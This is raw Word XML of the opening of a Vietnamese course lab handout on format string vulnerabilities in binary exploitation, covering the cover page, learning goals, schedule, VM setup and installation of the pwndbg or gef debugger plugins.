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683801"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="30D06BF6" w14:textId="2C8117C3" w:rsidR="00572592" w:rsidRDefault="00572592" w:rsidP="00A349CB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:rFonts w:ascii="UTM Trajan Pro Bold" w:hAnsi="UTM Trajan Pro Bold" w:cs="AvantGarde"/>
          <w:noProof/>
          <w:sz w:val="186"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74A11E68" wp14:editId="17A9A5FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>42573</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1406249</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="811033"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11033" cy="723900"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txb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A11E68" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 3" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:3.35pt;margin-top:110.75pt;width:63.8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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51ED7C8C" w14:textId="77777777" w:rsidR="00572592" w:rsidRPr="000F60BE" w:rsidRDefault="00572592" w:rsidP="00A349CB">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000F60BE">
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>Lab</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1ECFF4A2" w14:textId="77777777" w:rsidR="00572592" w:rsidRDefault="00572592" w:rsidP="00A349CB"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B09E3">
        <w:rPr>
          <w:rFonts w:ascii="UTM Trajan Pro Bold" w:hAnsi="UTM Trajan Pro Bold" w:cs="AvantGarde"/>
          <w:noProof/>
          <w:sz w:val="186"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00993FF9" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276EC96" w14:textId="77777777" w:rsidR="00A25786" w:rsidRPr="00AD4CCE" w:rsidRDefault="00A25786" w:rsidP="00A349CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Trajan Pro Bold" w:hAnsi="UTM Trajan Pro Bold" w:cs="AvantGarde"/>
          <w:noProof/>
          <w:sz w:val="186"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CA8EA3" w14:textId="77777777" w:rsidR="00572592" w:rsidRPr="00AD4CCE" w:rsidRDefault="00572592" w:rsidP="00A349CB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CEEDFC" w14:textId="21649894" w:rsidR="00572592" w:rsidRPr="00AD4CCE" w:rsidRDefault="00D97D5B" w:rsidP="00A349CB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658241" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70EBA076" wp14:editId="6251458E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1587634</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>109220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="520700"/>
                <wp:effectExtent l="12700" t="12700" r="25400" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Rectangle 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921000" cy="5207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076" id="Rectangle 28" o:spid="_x0000_s1027" style="position:absolute;margin-left:125pt;margin-top:8.6pt;width:230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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="682E799F" w14:textId="1B5AEA4C" w:rsidR="00D97D5B" w:rsidRPr="00DE60AF" w:rsidRDefault="00D97D5B" w:rsidP="00D97D5B">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09DB259A" w14:textId="3D4514A2" w:rsidR="008B2A15" w:rsidRPr="00DE60AF" w:rsidRDefault="008B2A15" w:rsidP="00D97D5B">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DE60AF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>FOR EDUCATIONAL PURPOSE</w:t>
                      </w:r>
                      <w:r w:rsidR="008A3FFF" w:rsidRPr="00DE60AF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> ONLY</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="148CD688" w14:textId="77777777" w:rsidR="00572592" w:rsidRPr="00AD4CCE" w:rsidRDefault="00572592" w:rsidP="00A349CB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053588A3" w14:textId="77777777" w:rsidR="008A3FFF" w:rsidRPr="00AD4CCE" w:rsidRDefault="008A3FFF" w:rsidP="002011DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="78"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E58AAC" w14:textId="7570BBF7" w:rsidR="00572592" w:rsidRPr="00386EE2" w:rsidRDefault="00386EE2" w:rsidP="00F471F0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="78"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="78"/>
        </w:rPr>
        <w:t>Format String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6754E" w14:textId="421D6AFD" w:rsidR="005D63E9" w:rsidRPr="00386EE2" w:rsidRDefault="00386EE2" w:rsidP="00CE1291">
      <w:pPr>
        <w:pStyle w:val="Header"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:noProof/>
          <w:sz w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:sz w:val="42"/>
        </w:rPr>
        <w:t>Binary Exploitaion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C18C61" w14:textId="3D2FAFCF" w:rsidR="000B28E8" w:rsidRPr="00AD4CCE" w:rsidRDefault="00572592" w:rsidP="00F471F0">
      <w:pPr>
        <w:pStyle w:val="Header"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hành </w:t>
      </w:r>
      <w:r w:rsidR="00A349CB" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>môn</w:t>
      </w:r>
      <w:r w:rsidR="00F471F0" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lập trình An toàn &amp; Khai thác lỗ hổng phần mềm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D568243" w14:textId="6A95AE27" w:rsidR="00374F57" w:rsidRPr="00374F57" w:rsidRDefault="00374F57" w:rsidP="00374F57">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00374F57">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00374F57">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://static.thenounproject.com/png/2512517-200.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00374F57">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00374F57">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A7E60DA" wp14:editId="040A3C92">
            <wp:extent cx="1488558" cy="1488558"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="Secure Coding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oding Icons - Download Free Vector Icons | Noun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978" cy="1498978"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00374F57">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8D259" w14:textId="67768E62" w:rsidR="005843E3" w:rsidRPr="00AD4CCE" w:rsidRDefault="005843E3" w:rsidP="00774A08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7C9323" w14:textId="77777777" w:rsidR="00A349CB" w:rsidRPr="00AD4CCE" w:rsidRDefault="00A349CB" w:rsidP="0010394E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388D9383" w14:textId="77777777" w:rsidR="00DC3884" w:rsidRDefault="00DC3884" w:rsidP="00A349CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52059779" w14:textId="1B23695B" w:rsidR="00C87348" w:rsidRPr="00AD4CCE" w:rsidRDefault="00572592" w:rsidP="00A349CB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Lưu hành nội bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284E1E8" w14:textId="607F7ADD" w:rsidR="00A25786" w:rsidRPr="00AD4CCE" w:rsidRDefault="00D16D8B" w:rsidP="00774A08">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;Nghiêm cấm đăng tải trên internet dưới mọi hình thức&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90D765" w14:textId="77777777" w:rsidR="000C7F39" w:rsidRPr="00AD4CCE" w:rsidRDefault="00E54458" w:rsidP="00F20ED0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TỔNG QUAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA420BF" w14:textId="56A0481E" w:rsidR="00CB56E7" w:rsidRDefault="00CB56E7" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB926B" w14:textId="3F5FE42B" w:rsidR="00A25786" w:rsidRPr="00A25786" w:rsidRDefault="00A25786" w:rsidP="00A25786">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:kern w:val="28"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A25786">
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
          <w:color w:val="212120"/>
          <w:kern w:val="28"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tìm hiểu lỗ hổng format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AB71D" w14:textId="77777777" w:rsidR="00CB56E7" w:rsidRPr="00AD4CCE" w:rsidRDefault="008435E1" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Thời gian thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1FC368" w14:textId="77777777" w:rsidR="00766D37" w:rsidRPr="00AD4CCE" w:rsidRDefault="008435E1" w:rsidP="007A6ADB">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hành tại lớp: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> tiết tại phòng thực hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59982799" w14:textId="141C0236" w:rsidR="008435E1" w:rsidRPr="00AD4CCE" w:rsidRDefault="008435E1" w:rsidP="007A6ADB">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK21"/>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK22"/>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Hoàn thành báo cáo kết quả thực hành: tối đa </w:t>
      </w:r>
      <w:r w:rsidR="00C83EC2" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> ngày.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="3D3408FA" w14:textId="77777777" w:rsidR="003372BC" w:rsidRPr="00AD4CCE" w:rsidRDefault="003372BC" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Môi trường</w:t>
      </w:r>
      <w:r w:rsidR="00EF6B20" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008435E1" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1943B" w14:textId="16D1C9D0" w:rsidR="00AD4CCE" w:rsidRPr="00AD4CCE" w:rsidRDefault="00BF38AA" w:rsidP="00BF38AA">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK25"/>
      <w:bookmarkStart w:id="4" w:name="OLE_LINK26"/>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Sinh viên cần chuẩn bị trước máy tính với môi trường thực hành như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3E6EF" w14:textId="08C924F9" w:rsidR="001D78CC" w:rsidRPr="00B8753E" w:rsidRDefault="00E50001" w:rsidP="00B8753E">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="OLE_LINK15"/>
      <w:bookmarkStart w:id="6" w:name="OLE_LINK20"/>
      <w:bookmarkStart w:id="7" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="8" w:name="OLE_LINK2"/>
      <w:r w:rsidRPr="00B8753E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- 1 PC cá nhân với hệ điều hành tự chọn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1F5DD3" w14:textId="0F06CFAD" w:rsidR="00184888" w:rsidRPr="00B8753E" w:rsidRDefault="004E56F1" w:rsidP="00B8753E">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8753E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Virtual Box </w:t>
      </w:r>
      <w:r w:rsidR="001F5027" w:rsidRPr="00B8753E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>hoặc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8753E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8753E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>VMWare</w:t>
      </w:r>
      <w:r w:rsidR="001F5027" w:rsidRPr="00B8753E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + máy ảo </w:t>
      </w:r>
      <w:r w:rsidR="001F5027" w:rsidRPr="00B8753E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="000608C5" w:rsidRPr="00B8753E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="0EB6D497" w14:textId="741BE34C" w:rsidR="00B80D53" w:rsidRDefault="007454F1" w:rsidP="007B32C7">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>Sinh viên có thể l</w:t>
      </w:r>
      <w:r w:rsidR="00B80D53">
        <w:t>ựa chọn cài đặt 1 trong 2 plug-in sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7A032" w14:textId="21C83C86" w:rsidR="007454F1" w:rsidRPr="00FD465D" w:rsidRDefault="007454F1" w:rsidP="00FD465D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lưu ý: cần </w:t>
      </w:r>
      <w:r w:rsidR="00C53FC2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>bỏ liên kết giữa gdb và peda (đã cài ở Lab 3) trước khi cài đặt các plugin này bằng cách xóa dòng</w:t>
      </w:r>
      <w:r w:rsidR="00FD465D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> trong file </w:t>
      </w:r>
      <w:r w:rsidR="00FD465D" w:rsidRPr="00FD465D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>~/.gdbinit</w:t>
      </w:r>
      <w:r w:rsidR="00FD465D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB867CC" w14:textId="63FA26FE" w:rsidR="00915818" w:rsidRDefault="00915818" w:rsidP="00B80D53">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80D53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i đặt</w:t>
      </w:r>
      <w:r w:rsidR="00B80D53" w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> pwndbg </w:t>
      </w:r>
      <w:r w:rsidR="00B80D53" w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cho </w:t>
      </w:r>
      <w:r w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026C1F5" w14:textId="434949DA" w:rsidR="00915818" w:rsidRDefault="00B80D53" w:rsidP="00A06F0D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Xem hướng dẫn tại: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00AD3FAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/pwndbg/pwndbg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FD27C27" w14:textId="3CF7E144" w:rsidR="00915818" w:rsidRPr="00915818" w:rsidRDefault="00B80D53" w:rsidP="00B80D53">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:bCs/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cài đặt plugin gef cho gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE5304" w14:textId="03D1BC9D" w:rsidR="00915818" w:rsidRDefault="007454F1" w:rsidP="00A06F0D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Xem </w:t>
      </w:r>
      <w:r>
        <w:t>hướng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> dẫn tại: </w:t>
      </w:r>
